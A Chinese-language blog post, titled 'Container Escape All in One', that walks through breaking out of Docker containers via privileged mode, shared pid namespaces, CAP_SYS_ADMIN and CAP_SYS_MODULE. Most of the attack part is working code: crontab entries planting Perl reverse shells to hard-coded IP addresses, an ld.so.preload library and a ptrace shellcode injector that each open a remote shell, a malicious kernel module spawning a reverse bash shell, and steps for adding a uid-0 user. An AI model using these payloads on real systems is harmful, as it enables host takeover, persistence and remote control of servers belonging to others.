<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>容器逃逸 All in One | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="CAP权限配置不当privileged,特权容器提权测试环境配置1docker run -it --privileged ubuntu:18.04 实际环境利用如果查看到CapEff为0000003fffffffff代表为特权容器，可以逃逸 12cat &#x2F;proc&#x2F;1&#x2F;status|grep CapEffCapEff:	0000003fffffffff 逃逸方法，挂载宿主机根目录 1234fdis">
<meta property="og:type" content="article">
<meta property="og:title" content="容器逃逸 All in One">
<meta property="og:url" content="http://example.com/2023/11/15/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="CAP权限配置不当privileged,特权容器提权测试环境配置1docker run -it --privileged ubuntu:18.04 实际环境利用如果查看到CapEff为0000003fffffffff代表为特权容器，可以逃逸 12cat &#x2F;proc&#x2F;1&#x2F;status|grep CapEffCapEff:	0000003fffffffff 逃逸方法，挂载宿主机根目录 1234fdis">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684122606601-e8538bb4-f071-46f7-ae87-46b292b843a2.png#clientId=u4062fab9-acd5-4&from=drop&id=u8b9f92ca&originHeight=304&originWidth=3048&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1094641&status=done&style=none&taskId=u6d4cce36-88e6-4c78-ae9a-79328aa7688&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483016363-e3a5c278-ec5a-4b12-bb55-0fe75f7714b8.png#clientId=ua0af21ff-e113-4&from=drop&id=u399e5c65&originHeight=116&originWidth=2858&originalType=binary&ratio=2&rotation=0&showTitle=false&size=372576&status=done&style=none&taskId=ub351a274-9d07-4ddd-94b7-3c3941db12c&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483038894-b6dad13f-44b1-418f-b5a7-9a08fbdefa49.png#clientId=ua0af21ff-e113-4&from=drop&id=obrUX&originHeight=148&originWidth=1200&originalType=binary&ratio=2&rotation=0&showTitle=false&size=218242&status=done&style=none&taskId=ua020c68a-5f64-4e5c-805e-f51ebfe73dd&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483158651-48033beb-3dae-463f-a89b-1e9197fe3721.png#clientId=ua0af21ff-e113-4&from=drop&id=ue5541068&originHeight=184&originWidth=3790&originalType=binary&ratio=2&rotation=0&showTitle=false&size=756865&status=done&style=none&taskId=u06804003-6678-41ba-a7cf-d5346899794&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483484245-a9534144-ebd2-47ec-8583-c381f3edecf7.png#clientId=ua0af21ff-e113-4&from=drop&id=ub92e3871&originHeight=150&originWidth=798&originalType=binary&ratio=2&rotation=0&showTitle=false&size=156280&status=done&style=none&taskId=uda9b80be-6ea7-4047-8a0c-57b8126bc69&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483499278-e02c1b29-4485-4458-9b0d-2051b92aadf1.png#clientId=ua0af21ff-e113-4&from=drop&id=u04d3e4eb&originHeight=1094&originWidth=1764&originalType=binary&ratio=2&rotation=0&showTitle=false&size=2135400&status=done&style=none&taskId=u97be1bec-1a9d-4390-bed9-fec5ee95868&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484620778-eadc0a59-4724-4a03-957d-2a280760b622.png#clientId=ua0af21ff-e113-4&from=drop&id=Zeaa4&originHeight=176&originWidth=3138&originalType=binary&ratio=2&rotation=0&showTitle=false&size=565797&status=done&style=none&taskId=u97db489d-b514-44d1-81e8-9695a6518b6&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484796871-a990cdef-aa61-4e8e-b62a-57db922ccfb3.png#clientId=ua0af21ff-e113-4&from=drop&id=tCa8n&originHeight=226&originWidth=3840&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1047128&status=done&style=none&taskId=ue944eb57-fc46-4048-8abe-60a02a2eb41&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484891297-032500cc-e095-48a5-b4be-f621a6a7c7c5.png#clientId=ua0af21ff-e113-4&from=drop&id=u29c0cebb&originHeight=410&originWidth=1874&originalType=binary&ratio=2&rotation=0&showTitle=false&size=845442&status=done&style=none&taskId=u3abd8121-11d1-4319-bf9d-8dfea71ef4f&title=">
<meta property="og:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484967342-cb2123de-8f55-4792-85e3-34cba17f3bfd.png#clientId=ua0af21ff-e113-4&from=drop&id=u4d17c29f&originHeight=1168&originWidth=1388&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1596699&status=done&style=none&taskId=uca5de9c8-2e0c-4f9c-a3b0-e52eb84afb8&title=">
<meta property="article:published_time" content="2023-11-15T05:51:34.000Z">
<meta property="article:modified_time" content="2023-11-15T05:53:25.530Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684122606601-e8538bb4-f071-46f7-ae87-46b292b843a2.png#clientId=u4062fab9-acd5-4&from=drop&id=u8b9f92ca&originHeight=304&originWidth=3048&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1094641&status=done&style=none&taskId=u6d4cce36-88e6-4c78-ae9a-79328aa7688&title=">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-容器逃逸" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/11/15/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/" class="article-date">
  <time class="dt-published" datetime="2023-11-15T05:51:34.000Z" itemprop="datePublished">2023-11-15</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      容器逃逸 All in One
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="CAP权限配置不当"><a href="#CAP权限配置不当" class="headerlink" title="CAP权限配置不当"></a><strong>CAP权限配置不当</strong></h1><h2 id="privileged-特权容器提权"><a href="#privileged-特权容器提权" class="headerlink" title="privileged,特权容器提权"></a>privileged,特权容器提权</h2><h3 id="测试环境配置"><a href="#测试环境配置" class="headerlink" title="测试环境配置"></a>测试环境配置</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --privileged ubuntu:<span class="number">18.04</span></span><br></pre></td></tr></table></figure>
<h3 id="实际环境利用"><a href="#实际环境利用" class="headerlink" title="实际环境利用"></a>实际环境利用</h3><p>如果查看到CapEff为0000003fffffffff代表为特权容器，可以逃逸</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/<span class="number">1</span>/status|grep CapEff</span><br><span class="line">CapEff:	<span class="number">0000003f</span>ffffffff</span><br></pre></td></tr></table></figure>
<p>逃逸方法，挂载宿主机根目录</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l|grep Linux</span><br><span class="line">mkdir /host</span><br><span class="line">mount /dev/vda1 /host</span><br><span class="line">chroot /host</span><br></pre></td></tr></table></figure>
<p>这个时候只是文件系统层面逃逸，还没有彻底逃逸,需要用到接下来的方法</p>
<h4 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h4><h5 id="var-spool-cron-crontabs-适用于ubuntu-debain"><a href="#var-spool-cron-crontabs-适用于ubuntu-debain" class="headerlink" title="&#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs&#x2F;   适用于ubuntu debain"></a>&#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs&#x2F;   适用于ubuntu debain</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -la /var/spool/cron/crontabs</span><br></pre></td></tr></table></figure>
<p>如果目录存在，代表我们可以写一个crontab</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo $<span class="string">&#x27;*/1 * * * * perl -e \&#x27;</span>use Socket;$i=<span class="string">&quot;121.5.230.115&quot;</span>;$p=<span class="number">8080</span>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(<span class="string">&quot;tcp&quot;</span>));<span class="keyword">if</span>(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,<span class="string">&quot;&gt;&amp;S&quot;</span>);open(STDOUT,<span class="string">&quot;&gt;&amp;S&quot;</span>);open(STDERR,<span class="string">&quot;&gt;&amp;S&quot;</span>);exec(<span class="string">&quot;/bin/sh -i&quot;</span>);&#125;;\<span class="string">&#x27;&#x27; &gt;&gt; /var/spool/cron/crontabs/root</span></span><br><span class="line"><span class="string">chmod 600 /var/spool/cron/crontabs/root</span></span><br></pre></td></tr></table></figure>
<p>然后就是彻底逃逸了</p>
<h5 id="var-spool-cron-适用于centos"><a href="#var-spool-cron-适用于centos" class="headerlink" title="&#x2F;var&#x2F;spool&#x2F;cron 适用于centos"></a>&#x2F;var&#x2F;spool&#x2F;cron 适用于centos</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -la /var/spool/cron/</span><br></pre></td></tr></table></figure>
<p>如果目录存在，代表我们可以写一个crontab</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo $<span class="string">&#x27;*/1 * * * * perl -e \&#x27;</span>use Socket;$i=<span class="string">&quot;121.5.230.115&quot;</span>;$p=<span class="number">8080</span>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(<span class="string">&quot;tcp&quot;</span>));<span class="keyword">if</span>(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,<span class="string">&quot;&gt;&amp;S&quot;</span>);open(STDOUT,<span class="string">&quot;&gt;&amp;S&quot;</span>);open(STDERR,<span class="string">&quot;&gt;&amp;S&quot;</span>);exec(<span class="string">&quot;/bin/sh -i&quot;</span>);&#125;;\<span class="string">&#x27;&#x27; &gt;&gt; /var/spool/cron/root</span></span><br><span class="line"><span class="string">chmod 600 /var/spool/cron/root</span></span><br></pre></td></tr></table></figure>
<h4 id="ld-so-preload"><a href="#ld-so-preload" class="headerlink" title="ld.so.preload"></a>ld.so.preload</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> tcp_port = <span class="number">8000</span>;</span><br><span class="line"><span class="type">char</span> *ip = <span class="string">&quot;121.40.192.181&quot;</span>;</span><br><span class="line">__attribute__((destructor)) <span class="type">void</span> <span class="title function_">test</span><span class="params">()</span>&#123;</span><br><span class="line">	remove(<span class="string">&quot;/etc/ld.so.preload&quot;</span>);</span><br><span class="line">	<span class="type">int</span> pid;</span><br><span class="line">	<span class="keyword">if</span>((pid=fork())==<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="type">int</span> fd;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">addr</span>;</span></span><br><span class="line">        addr.sin_family = AF_INET;</span><br><span class="line">        addr.sin_port = htons(tcp_port);</span><br><span class="line">        addr.sin_addr.s_addr = inet_addr(ip);</span><br><span class="line">        fd = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line">        connect(fd, (<span class="keyword">struct</span> sockaddr*)&amp;addr, <span class="keyword">sizeof</span>(addr));</span><br><span class="line">        dup2(fd, <span class="number">0</span>);</span><br><span class="line">        dup2(fd, <span class="number">1</span>);</span><br><span class="line">        dup2(fd, <span class="number">2</span>);</span><br><span class="line">        system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc evil.c --shared -fPIC -o evil.so</span><br></pre></td></tr></table></figure>
<p>上传evil.so到&#x2F;tmp</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo <span class="string">&#x27;/tmp/evil.so&#x27;</span> &gt;/etc/ld.so.preload</span><br></pre></td></tr></table></figure>
<p>然后下次系统会自动load这个so,并且可以实现无感知注入,达到逃逸,不过这种注入还是需要类似有运维操作才可以触发，或者说有新进程创建</p>
<h4 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h4><p>当文件系统逃逸到宿主机上，可以做端口扫描</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvz -w2  <span class="number">172.17</span><span class="number">.0</span><span class="number">.1</span> <span class="number">1</span><span class="number">-65535</span> <span class="number">2</span>&gt;&amp;<span class="number">1</span>|grep succeeded</span><br></pre></td></tr></table></figure>
<p>如果发现宿主机开放了ssh服务，那我们可以直接ssh登陆到宿主机上实现逃逸<br>直接adduser</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adduser test</span><br></pre></td></tr></table></figure>
<p>同时可以修改&#x2F;etc&#x2F;passwd 把test uid改为0变成root</p>
<h2 id="pid共享逃逸"><a href="#pid共享逃逸" class="headerlink" title="pid共享逃逸"></a>pid共享逃逸</h2><p>pid共享也是实际比较常见的场景，当我们发现有些进程对应的脚本文件在容器里面并没有，那么就是开启了pid共享，开启了pid共享还是有很多操作空间的</p>
<h3 id="特权容器"><a href="#特权容器" class="headerlink" title="+特权容器"></a>+特权容器</h3><h4 id="测试环境配置-1"><a href="#测试环境配置-1" class="headerlink" title="测试环境配置"></a>测试环境配置</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --pid=host  --privileged  ubuntu:<span class="number">18.04</span></span><br></pre></td></tr></table></figure>
<h4 id="实际环境利用-1"><a href="#实际环境利用-1" class="headerlink" title="实际环境利用"></a>实际环境利用</h4><h5 id="直接chroot"><a href="#直接chroot" class="headerlink" title="直接chroot"></a>直接chroot</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /proc/<span class="number">1</span>/root</span><br><span class="line">chroot .</span><br></pre></td></tr></table></figure>
<p>直接逃逸,然后可以再配合前面提到的方法进行完整的逃逸</p>
<h5 id="进程注入"><a href="#进程注入" class="headerlink" title="进程注入"></a>进程注入</h5><p>这里面要注意两种情况</p>
<ul>
<li>shellcode的问题，shellcode可能会出现\x90f1这种,需要在\x901f中间加””,不然解析会出现问题,hex escape sequence out of range</li>
<li>注释掉的shellcode存在后台进程注入的问题，因为没有做dup2<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ptrace.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/user.h&gt;</span></span></span><br><span class="line"><span class="comment">//this shellcode has dup problem unsigned char shellcode[]=&quot;H1\xc0H\x89\xc2H\x8d=&amp;\x00\x00\x00RWH\x8d=\x1a\x00\x00\x00WH\x8d=\x08\x00\x00\x00WH\x89\xe6\xb0;\x0f\x05/bin/bash\x00-c\x00/bin/bash -i &gt;&amp; /dev/tcp/116.62.69.120/8080 0&gt;&amp;1\x00&quot;;</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> shellcode[<span class="number">96</span>]=<span class="string">&quot;\xbf\x02\x00\x00\x00\xbe\x01\x00\x00\x00H1\xd2\xb8)\x00\x00\x00\x0f\x05H\x89\xc7ht&gt;Exfh\x1f\x90&quot;</span><span class="string">&quot;fj\x02T^\xba\x10\x00\x00\x00\xb8*\x00\x00\x00\x0f\x05\xbe\x03\x00\x00\x00H\xff\xce\xb8!\x00\x00\x00\x0f\x05u\xf4H\x8d=\r\x00\x00\x00H1\xf6H1\xd2\xb8;\x00\x00\x00\x0f\x05/bin/bash\x00&quot;</span>;</span><br><span class="line"><span class="type">char</span> *p;</span><br><span class="line"><span class="type">void</span> <span class="title function_">inject_data</span> <span class="params">(<span class="type">pid_t</span> pid,  <span class="type">uint32_t</span> *dst)</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="type">uint32_t</span> *src = (<span class="type">uint32_t</span> *) shellcode;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="keyword">sizeof</span>(shellcode); i+=<span class="number">4</span>, src++, dst++)</span><br><span class="line">        &#123;</span><br><span class="line">                <span class="keyword">if</span> ((ptrace (PTRACE_POKETEXT, pid, dst, *src)) &lt; <span class="number">0</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                        perror (<span class="string">&quot;ptrace(POKETEXT):&quot;</span>);</span><br><span class="line">                        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span> <span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="type">int</span>                     syscall;</span><br><span class="line">        <span class="type">long</span>                    dst;</span><br><span class="line">        <span class="keyword">if</span> (argc != <span class="number">2</span>)</span><br><span class="line">        &#123;</span><br><span class="line">                <span class="built_in">fprintf</span> (<span class="built_in">stderr</span>, <span class="string">&quot;Usage:\n\t%s pid\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">                <span class="built_in">exit</span> (<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">pid_t</span> target = atoi (argv[<span class="number">1</span>]);</span><br><span class="line">        <span class="keyword">if</span> ((ptrace (PTRACE_ATTACH, target, <span class="literal">NULL</span>, <span class="literal">NULL</span>)) &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">                perror (<span class="string">&quot;ptrace(ATTACH):&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span> (<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        wait (<span class="literal">NULL</span>);</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">user_regs_struct</span> <span class="title">regs</span>;</span></span><br><span class="line">        <span class="keyword">if</span> ((ptrace (PTRACE_GETREGS, target, <span class="literal">NULL</span>, &amp;regs)) &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">                perror (<span class="string">&quot;ptrace(GETREGS):&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span> (<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        inject_data (target,(<span class="type">uint32_t</span> *)regs.rip);</span><br><span class="line">        regs.rip += <span class="number">2</span>;</span><br><span class="line">        <span class="keyword">if</span> ((ptrace (PTRACE_SETREGS, target, <span class="literal">NULL</span>, &amp;regs)) &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">                perror (<span class="string">&quot;ptrace(SETREGS):&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span> (<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> ((ptrace (PTRACE_DETACH, target, <span class="literal">NULL</span>, <span class="literal">NULL</span>)) &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">                perror (<span class="string">&quot;ptrace(DETACH):&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span> (<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="不是特权容器"><a href="#不是特权容器" class="headerlink" title="不是特权容器"></a>不是特权容器</h3><p>这里我试了一下，就算给CAP_SYS_PTRACE和CAP_SYS_ADMIN都是不太好逃逸的，这里可能跟我docker版本比较新有关系，实际可以尝试一下，当pid共享的时候通过进程注入的方式来逃逸，这里就可以注入宿主机的进程，同时这种情况也可以关注一下，宿主机进程的目录我们是否有权限去写，或者说挂载了某些可控的目录<br>19.03.5版本的docker有CAP_STS_PTRACE和pid共享是可以直接注入的</p>
<h2 id="CAP-SYS-ADMIN"><a href="#CAP-SYS-ADMIN" class="headerlink" title="CAP_SYS_ADMIN"></a>CAP_SYS_ADMIN</h2><p>docker run  -it –cap-add&#x3D;SYS_ADMIN –security-opt apparmor&#x3D;unconfined ubuntu:18.04 bash<br>在新版本的docker中，不能再使用core_pattern的方式进行逃逸，因为我们无法mount proc目录，那么我们只好把目光转向ebpf</p>
<h3 id="ebpf"><a href="#ebpf" class="headerlink" title="ebpf"></a>ebpf</h3><h4 id="测试环境配置-2"><a href="#测试环境配置-2" class="headerlink" title="测试环境配置"></a>测试环境配置</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --cap-add=SYS_ADMIN  ubuntu:<span class="number">18.04</span></span><br></pre></td></tr></table></figure>
<h4 id="实际环境利用-2"><a href="#实际环境利用-2" class="headerlink" title="实际环境利用"></a>实际环境利用</h4><p><a target="_blank" rel="noopener" href="https://github.com/cdk-team/CDK">https://github.com/cdk-team/CDK</a></p>
<h2 id="CAP-SYS-MODULE"><a href="#CAP-SYS-MODULE" class="headerlink" title="CAP_SYS_MODULE"></a><strong>CAP_SYS_MODULE</strong></h2><h3 id="测试环境配置-3"><a href="#测试环境配置-3" class="headerlink" title="测试环境配置"></a>测试环境配置</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --cap-add=SYS_MODULE  ubuntu:<span class="number">18.04</span></span><br></pre></td></tr></table></figure>
<h3 id="实际环境利用-3"><a href="#实际环境利用-3" class="headerlink" title="实际环境利用"></a>实际环境利用</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/self/status|grep Cap</span><br></pre></td></tr></table></figure>
<p>发现有CAP_SYS_MODULE权限，那么直接往内核注入module,我们直接再容器里面安装必备的东西</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt update&amp;&amp;apt install -y gcc make  vim  linux-headers-$(uname -r) kmod</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line">MODULE_LICENSE(<span class="string">&quot;GPL&quot;</span>);</span><br><span class="line"><span class="type">char</span> *argv[] = &#123;</span><br><span class="line">    <span class="string">&quot;/bin/bash&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-c&quot;</span>,    </span><br><span class="line">    <span class="string">&quot;bash -i &gt;&amp;/dev/tcp/172.17.0.1/8888 0&gt;&amp;1&quot;</span>,</span><br><span class="line">    <span class="literal">NULL</span>    </span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">static</span> <span class="type">int</span> __init <span class="title function_">connect_back_init</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> call_usermodehelper(</span><br><span class="line">        argv[<span class="number">0</span>],     </span><br><span class="line">        argv,        </span><br><span class="line">        <span class="literal">NULL</span>,        </span><br><span class="line">        UMH_WAIT_EXEC <span class="comment">// don&#x27;t wait for program return status</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> __exit <span class="title function_">connect_back_exit</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">module_init(connect_back_init);</span><br><span class="line">module_exit(connect_back_exit);</span><br></pre></td></tr></table></figure>
